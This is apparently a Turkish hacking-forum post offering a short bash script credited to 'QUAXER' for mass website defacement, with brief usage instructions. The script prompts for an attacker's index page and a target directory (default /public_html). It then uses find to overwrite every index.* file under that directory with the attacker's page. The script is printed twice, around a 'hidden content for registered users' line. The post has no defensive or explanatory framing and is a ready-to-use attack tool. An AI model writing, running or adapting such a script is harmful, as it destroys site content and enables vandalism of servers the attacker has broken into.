Kullanımı: dosyaismi.sh şeklinde kaydediniz. Sonra ./dosyaismi.sh şeklinde çalıştırabiirsiniz.
#!/bin/bash
echo '[+] Indexiniz oldugu dizin (/dizini/index.html)'
read index
echo
echo '[+] Hedef Deface için dizin giriniz ( Default /public_html) '
read path
echo
echo '[+] Indexlenıyor [By QUAXER] ........'
find $path -name "index.*" -exec cp $index {} \;
echo
echo '[+] Done !'
View hidden content is available for registered users!
#!/bin/bash
echo '[+] Indexiniz oldugu dizin (/dizini/index.html)'
read index
echo
echo '[+] Hedef Deface için dizin giriniz ( Default /public_html) '
read path
echo
echo '[+] Indexlenıyor [By QUAXER] ........'
find $path -name "index.*" -exec cp $index {} \;
echo
echo '[+] Done !'